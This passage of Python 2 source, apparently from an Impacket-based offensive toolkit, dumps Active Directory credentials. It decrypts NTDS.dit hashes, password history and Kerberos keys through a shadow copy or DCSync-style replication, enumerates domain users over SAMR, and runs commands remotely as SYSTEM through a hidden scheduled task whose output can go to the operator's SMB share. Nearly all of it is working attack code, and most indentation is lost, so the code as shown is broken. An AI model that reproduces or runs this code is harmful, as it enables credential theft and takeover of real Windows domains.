self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME)
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
return remoteFileName
class NTDSHashes:
NAME_TO_INTERNAL = {
'uSNCreated':'ATTq131091',
'uSNChanged':'ATTq131192',
'name':'ATTm3',
'objectGUID':'ATTk589826',
'objectSid':'ATTr589970',
'userAccountControl':'ATTj589832',
'primaryGroupID':'ATTj589922',
'accountExpires':'ATTq589983',
'logonCount':'ATTj589993',
'sAMAccountName':'ATTm590045',
'sAMAccountType':'ATTj590126',
'lastLogonTimestamp':'ATTq589876',
'userPrincipalName':'ATTm590480',
'unicodePwd':'ATTk589914',
'dBCSPwd':'ATTk589879',
'ntPwdHistory':'ATTk589918',
'lmPwdHistory':'ATTk589984',
'pekList':'ATTk590689',
'supplementalCredentials':'ATTk589949',
}
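    # The ATTq/ATTm/ATTk/ATTj/ATTr prefixes are the ESE datatable's internal
    # column names for these LDAP attributes (the letter encodes the attribute
    # syntax: q = large integer, j = integer, m = string, k = binary, r = SID).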
NAME_TO_ATTRTYP = {
'userPrincipalName': 0x90290,
'sAMAccountName': 0x900DD,
'unicodePwd': 0x9005A,
'dBCSPwd': 0x90037,
'ntPwdHistory': 0x9005E,
'lmPwdHistory': 0x900A0,
'supplementalCredentials': 0x9007D,
'objectSid': 0x90092,
}
KERBEROS_TYPE = {
        1:'des-cbc-crc',
3:'des-cbc-md5',
17:'aes128-cts-hmac-sha1-96',
18:'aes256-cts-hmac-sha1-96',
0xffffff74:'rc4_hmac',
}
INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.iteritems())
SAM_NORMAL_USER_ACCOUNT = 0x30000000
SAM_MACHINE_ACCOUNT = 0x30000001
SAM_TRUST_ACCOUNT = 0x30000002
ACCOUNT_TYPES = ( SAM_NORMAL_USER_ACCOUNT, SAM_MACHINE_ACCOUNT, SAM_TRUST_ACCOUNT)
class PEK_KEY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedPek','52s=""'),
)
class CRYPTED_HASH(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash','16s=""'),
)
class CRYPTED_HISTORY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
class CRYPTED_BLOB(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
def __init__(self, ntdsFile, bootKey, noLMHash=True, remoteOps=None, useVSSMethod=False):
self.__bootKey = bootKey
self.__NTDS = ntdsFile
self.__history = False
self.__noLMHash = noLMHash
self.__useVSSMethod = useVSSMethod
self.dumped_hashes = {'hashes': [], 'kerb': []}
self.__remoteOps = remoteOps
if self.__NTDS is not None:
self.__ESEDB = ESENT_DB(ntdsFile, isRemote = True)
self.__cursor = self.__ESEDB.openTable('datatable')
self.__tmpUsers = list()
self.__PEK = None
self.__cryptoCommon = CryptoCommon()
self.__hashesFound = {}
self.__kerberosKeys = OrderedDict()
def __getPek(self):
logging.info('Searching for pekList, be patient')
pek = None
while True:
record = self.__ESEDB.getNextRow(self.__cursor)
if record is None:
break
elif record[self.NAME_TO_INTERNAL['pekList']] is not None:
pek = unhexlify(record[self.NAME_TO_INTERNAL['pekList']])
break
elif record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
# Okey.. we found some users, but we're not yet ready to process them.
# Let's just store them in a temp list
self.__tmpUsers.append(record)
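        # The pekList blob is RC4-decrypted with a key built as
        # MD5(bootKey + KeyMaterial * 1000); the resulting Password Encryption
        # Key (PEK) is what unwraps every hash stored in the datatable.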
if pek is not None:
encryptedPek = self.PEK_KEY(pek)
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(encryptedPek['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(encryptedPek['EncryptedPek'])
self.__PEK = plainText[36:]
def __removeRC4Layer(self, cryptedHash):
md5 = hashlib.new('md5')
md5.update(self.__PEK)
md5.update(cryptedHash['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(cryptedHash['EncryptedHash'])
return plainText
def __removeDESLayer(self, cryptedHash, rid):
Key1,Key2 = self.__cryptoCommon.deriveKey(int(rid))
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
decryptedHash = Crypt1.decrypt(cryptedHash[:8]) + Crypt2.decrypt(cryptedHash[8:])
return decryptedHash
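    # NTDS.dit hashes are doubly wrapped: an outer RC4 layer keyed with
    # MD5(PEK + KeyMaterial) and an inner pair of single-DES blocks keyed from
    # the account RID, the same per-RID DES scheme SAM uses locally.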
def __decryptSupplementalInfo(self, record, rid=None):
# This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
haveInfo = False
if self.__useVSSMethod is True:
if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
if len(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']])) > 24:
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
cipherText = self.CRYPTED_BLOB(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']]))
plainText = self.__removeRC4Layer(cipherText)
haveInfo = True
else:
domain = None
userName = None
for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['userPrincipalName']:
if attr['AttrVal']['valCount'] > 0:
try:
domain = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
except:
domain = None
else:
domain = None
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['sAMAccountName']:
if attr['AttrVal']['valCount'] > 0:
try:
userName = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
except:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
else:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['supplementalCredentials']:
if attr['AttrVal']['valCount'] > 0:
blob = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
plainText = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), blob)
if len(plainText) > 24:
haveInfo = True
if domain is not None:
userName = '%s\\%s' % (domain, userName)
if haveInfo is True:
try:
userProperties = samr.USER_PROPERTIES(plainText)
except:
# On some old w2k3 there might be user properties that don't
# match [MS-SAMR] structure, discarding them
return
propertiesData = userProperties['UserProperties']
for propertyCount in range(userProperties['PropertyCount']):
userProperty = samr.USER_PROPERTY(propertiesData)
propertiesData = propertiesData[len(userProperty):]
# For now, we will only process Newer Kerberos Keys.
if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
propertyValueBuffer = unhexlify(userProperty['PropertyValue'])
kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
data = kerbStoredCredentialNew['Buffer']
for credential in range(kerbStoredCredentialNew['CredentialCount']):
keyDataNew = samr.KERB_KEY_DATA_NEW(data)
data = data[len(keyDataNew):]
keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
if self.KERBEROS_TYPE.has_key(keyDataNew['KeyType']):
answer = "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],hexlify(keyValue))
else:
answer = "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),hexlify(keyValue))
# We're just storing the keys, not printing them, to make the output more readable
# This is kind of ugly... but it's what I came up with tonight to get an ordered
# set :P. Better ideas welcomed ;)
self.__kerberosKeys[answer] = None
def __decryptHash(self, record, rid=None):
if self.__useVSSMethod is True:
logging.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
sid = SAMR_RPC_SID(unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]))
rid = sid.formatCanonical().split('-')[-1]
if record[self.NAME_TO_INTERNAL['dBCSPwd']] is not None:
encryptedLMHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['dBCSPwd']]))
tmpLMHash = self.__removeRC4Layer(encryptedLMHash)
LMHash = self.__removeDESLayer(tmpLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('', '')
if record[self.NAME_TO_INTERNAL['unicodePwd']] is not None:
encryptedNTHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['unicodePwd']]))
tmpNTHash = self.__removeRC4Layer(encryptedNTHash)
NTHash = self.__removeDESLayer(tmpNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('', '')
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash), hexlify(NTHash))
self.__hashesFound[unhexlify(record[self.NAME_TO_INTERNAL['objectSid']])] = answer
self.dumped_hashes['hashes'].append(answer)
if self.__history:
LMHistory = []
NTHistory = []
if record[self.NAME_TO_INTERNAL['lmPwdHistory']] is not None:
encryptedLMHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['lmPwdHistory']]))
tmpLMHistory = self.__removeRC4Layer(encryptedLMHistory)
for i in range(0, len(tmpLMHistory) / 16):
LMHash = self.__removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
LMHistory.append(LMHash)
if record[self.NAME_TO_INTERNAL['ntPwdHistory']] is not None:
encryptedNTHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['ntPwdHistory']]))
tmpNTHistory = self.__removeRC4Layer(encryptedNTHistory)
for i in range(0, len(tmpNTHistory) / 16):
NTHash = self.__removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
NTHistory.append(NTHash)
for i, (LMHash, NTHash) in enumerate(
map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = hexlify(ntlm.LMOWFv1('', ''))
else:
lmhash = hexlify(LMHash)
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, hexlify(NTHash))
self.__hashesFound[unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]) + str(i)] = answer
self.dumped_hashes['hashes'].append(answer)
else:
logging.debug('Decrypting hash for user: %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
domain = None
if self.__history:
LMHistory = []
NTHistory = []
for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['dBCSPwd']:
if attr['AttrVal']['valCount'] > 0:
encrypteddBCSPwd = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
encryptedLMHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encrypteddBCSPwd)
LMHash = drsuapi.removeDESLayer(encryptedLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('', '')
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['unicodePwd']:
if attr['AttrVal']['valCount'] > 0:
encryptedUnicodePwd = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
encryptedNTHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedUnicodePwd)
NTHash = drsuapi.removeDESLayer(encryptedNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('', '')
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['userPrincipalName']:
if attr['AttrVal']['valCount'] > 0:
try:
domain = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
except:
domain = None
else:
domain = None
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['sAMAccountName']:
if attr['AttrVal']['valCount'] > 0:
try:
userName = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
except:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
else:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['objectSid']:
if attr['AttrVal']['valCount'] > 0:
objectSid = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
else:
logging.error('Cannot get objectSid for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
objectSid = rid
if self.__history:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['lmPwdHistory']:
if attr['AttrVal']['valCount'] > 0:
encryptedLMHistory = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
tmpLMHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedLMHistory)
for i in range(0, len(tmpLMHistory) / 16):
LMHashHistory = drsuapi.removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
LMHistory.append(LMHashHistory)
else:
logging.debug('No lmPwdHistory for user %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['ntPwdHistory']:
if attr['AttrVal']['valCount'] > 0:
encryptedNTHistory = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
tmpNTHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedNTHistory)
for i in range(0, len(tmpNTHistory) / 16):
NTHashHistory = drsuapi.removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
NTHistory.append(NTHashHistory)
else:
logging.debug('No ntPwdHistory for user %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
if domain is not None:
userName = '%s\\%s' % (domain, userName)
answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash), hexlify(NTHash))
self.__hashesFound[objectSid] = answer
self.dumped_hashes['hashes'].append(answer)
if self.__history:
for i, (LMHashHistory, NTHashHistory) in enumerate(
map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = hexlify(ntlm.LMOWFv1('', ''))
else:
lmhash = hexlify(LMHashHistory)
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, hexlify(NTHashHistory))
self.__hashesFound[objectSid + str(i)] = answer
                    self.dumped_hashes['hashes'].append(answer)
def dump(self):
if self.__NTDS is None and self.__useVSSMethod is True:
# No NTDS.dit file provided and were asked to use VSS
return
else:
try:
self.__remoteOps.connectSamr(self.__remoteOps.getMachineNameAndDomain()[1])
except:
# Target's not a DC
return
logging.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
if self.__useVSSMethod:
            # We start getting rows from the table aiming at reaching
            # the pekList. If we find user records we store them
            # in a temp list for later processing.
self.__getPek()
if self.__PEK is not None:
logging.info('Pek found and decrypted: 0x%s' % hexlify(self.__PEK))
logging.info('Reading and decrypting hashes from %s ' % self.__NTDS)
# First of all, if we have users already cached, let's decrypt their hashes
for record in self.__tmpUsers:
try:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
# import traceback
# print traceback.print_exc()
try:
logging.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
logging.error('Error while calling getNextRow(), trying the next one')
continue
if record is None:
break
try:
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
# import traceback
# print traceback.print_exc()
try:
logging.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
else:
logging.info('Using the DRSUAPI method to get NTDS.DIT secrets')
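            # DCSYNC-style path: enumerate RIDs over SAMR, crack each SID to a
            # DS_FQDN_1779 name, then have the DC "replicate" that one object
            # via DRSGetNCChanges and decrypt the attributes it returns.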
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
resp = self.__remoteOps.getDomainUsers(enumerationContext)
for user in resp['Buffer']['Buffer']:
userName = user['Name']
userSid = self.__remoteOps.ridToSid(user['RelativeId'])
# Let's crack the user sid into DS_FQDN_1779_NAME
# In theory I shouldn't need to crack the sid. Instead
# I could use it when calling DRSGetNCChanges inside the DSNAME parameter.
# For some reason tho, I get ERROR_DS_DRA_BAD_DN when doing so.
crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME, drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name = userSid.formatCanonical())
if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])
#userRecord.dump()
if userRecord['pmsgOut']['V6']['cNumObjects'] == 0:
raise Exception('DRSGetNCChanges didn\'t return any object!')
                    else:
                        logging.warning('DRSCrackNames returned %d items for user %s, skipping' %(crackedName['pmsgOut']['V1']['pResult']['cItems'], userName))
                        continue
try:
self.__decryptHash(userRecord, user['RelativeId'])
self.__decryptSupplementalInfo(userRecord, user['RelativeId'])
except Exception, e:
#import traceback
#traceback.print_exc()
logging.error("Error while processing user!")
logging.error(str(e))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
# Now we'll print the Kerberos keys. So we don't mix things up in the output.
if len(self.__kerberosKeys) > 0:
if self.__useVSSMethod is True:
logging.info('Kerberos keys from %s ' % self.__NTDS)
else:
logging.info('Kerberos keys grabbed')
for itemKey in self.__kerberosKeys.keys():
self.dumped_hashes['kerb'].append(itemKey)
return self.dumped_hashes
def export(self, fileName):
if len(self.__hashesFound) > 0:
items = sorted(self.__hashesFound)
fd = open(fileName+'.ntds','w+')
for item in items:
try:
fd.write(self.__hashesFound[item]+'\n')
except:
try:
logging.error("Error writing entry %d, skipping" % item)
except:
logging.error("Error writing entry, skipping")
pass
fd.close()
if len(self.__kerberosKeys) > 0:
fd = open(fileName+'.ntds.kerberos','w+')
for itemKey in self.__kerberosKeys.keys():
fd.write(itemKey+'\n')
fd.close()
def finish(self):
if self.__NTDS is not None:
self.__ESEDB.close()
class DumpSecrets:
def __init__(self, address, username='', password='', domain='', hashes=None, sam=False, ntds=False, useVSSMethod=False, useNinjaMethod=False):
self.__remoteAddr = address
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__sam = sam
self.__ntds = ntds
self.__useVSSMethod = useVSSMethod
self.__useNinjaMethod = useNinjaMethod
self.__remoteOps = None
        self.__SAMHashes = None
        self.__NTDSHashes = None
self.__isRemote = True
self.dumped_ntds_hashes = None
self.dumped_sam_hashes = None
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet,key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
tmpKey = unhexlify(tmpKey)
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(bootKey))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def dump(self, smbconnection):
try:
self.__remoteOps = RemoteOperations(smbconnection)
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
SECURITYFileName = self.__remoteOps.saveSECURITY()
if self.__sam is True:
SAMFileName = self.__remoteOps.saveSAM()
self.__SAMHashes = SAMHashes(SAMFileName, bootKey)
self.dumped_sam_hashes = self.__SAMHashes.dump()
elif self.__ntds is True:
if self.__useVSSMethod:
NTDSFileName = self.__remoteOps.saveNTDS()
elif self.__useNinjaMethod:
NTDSFileName = self.__remoteOps.saveNTDS(ninja=True)
self.__useVSSMethod = True
else:
NTDSFileName = None
self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, noLMHash=self.__noLMHash, remoteOps=self.__remoteOps, useVSSMethod=self.__useVSSMethod)
try:
self.dumped_ntds_hashes = self.__NTDSHashes.dump()
except Exception, e:
logging.error(e)
if self.__useVSSMethod is False:
                        logging.info('Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter')
except (Exception, KeyboardInterrupt), e:
traceback.print_exc()
try:
self.cleanup()
except:
pass
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
class ListUsersException(Exception):
pass
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
}
def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = None, aesKey=None, doKerberos = False):
if not protocols:
self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
#logging.info('Retrieving endpoint list from %s' % addr)
# Try all requested protocols until one works.
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
#logging.info("Trying protocol %s..." % protocol)
rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
try:
return self.__fetchList(rpctransport)
except Exception, e:
logging.info(str(e))
else:
# Got a response. No need for further iterations.
break
def __fetchList(self, rpctransport):
dce = rpctransport.get_dce_rpc()
entries = {'users': []}
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
#logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
resp = samr.hSamrQueryInformationDomain(dce, domainHandle)
lthresh = resp['Buffer']['General2']['LockoutThreshold']
entries["lthresh"] = lthresh
if lthresh != 0:
entries['lduration'] = (resp['Buffer']['General2']['LockoutDuration'] / -600000000)
else:
entries['lduration'] = 0
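            # LockoutDuration is a negative interval in 100 ns ticks, hence
            # the / -600000000 above to get minutes. SamrEnumerateUsersInDomain
            # pages its results: STATUS_MORE_ENTRIES means "call again with the
            # returned EnumerationContext", which the loop below does.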
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])
info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)
#entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])
entries['users'].append(user['Name'])
samr.hSamrCloseHandle(dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except ListUsersException, e:
logging.info("Error listing users: %s" % e)
dce.disconnect()
return entries
class TSCH_EXEC:
def __init__(self, username, password, command, domain ='', hashes=None , noOutput=False):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__myIPaddr = None
self.__aesKey = None
self.__doKerberos = False
self.__command = command
self.__tmpName = ''.join([random.choice(string.letters) for _ in range(8)])
self.__tmpFileName = self.__tmpName + '.tmp'
self.__smbConnection = None
self.__dceConnection = None
self.__noOutput = noOutput
self.__mode = 'SHARE'
self.output = ''
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def play(self, addr):
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
try:
self.doStuff(rpctransport)
except Exception as e:
logging.info(e)
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >=0:
#If we receive the 'STATUS_OBJECT_NAME_NOT_FOUND' error, it might work if we try again
sleep(1)
self.doStuff(rpctransport)
else:
if self.__noOutput is False:
self.__myIPaddr = self.__smbConnection.getSMBServer().get_socket().getsockname()[0]
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.doStuff(rpctransport)
smb_server.stop()
def doStuff(self, rpctransport):
def output_callback(data):
self.output += data
dce = rpctransport.get_dce_rpc()
self.__dceConnection = dce
dce.set_credentials(*rpctransport.get_credentials())
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
"""
if self.__mode == 'SHARE':
xml += """ <Arguments>/C {} > %windir%\\Temp\\{} 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""".format(self.__command, self.__tmpFileName)
elif self.__mode == 'SERVER':
xml += """ <Arguments>/C {} > \\\\{}\\{}\\{} 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""".format(self.__command, self.__myIPaddr, DUMMY_SHARE, self.__tmpFileName)
taskCreated = False
try:
logging.info('Creating task \\%s' % self.__tmpName)
tsch.hSchRpcRegisterTask(dce, '\\%s' % self.__tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
taskCreated = True
logging.info('Running task \\%s' % self.__tmpName)
tsch.hSchRpcRun(dce, '\\%s' % self.__tmpName)
done = False
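            # SchRpcGetLastRunInfo reports wYear == 0 until the task has
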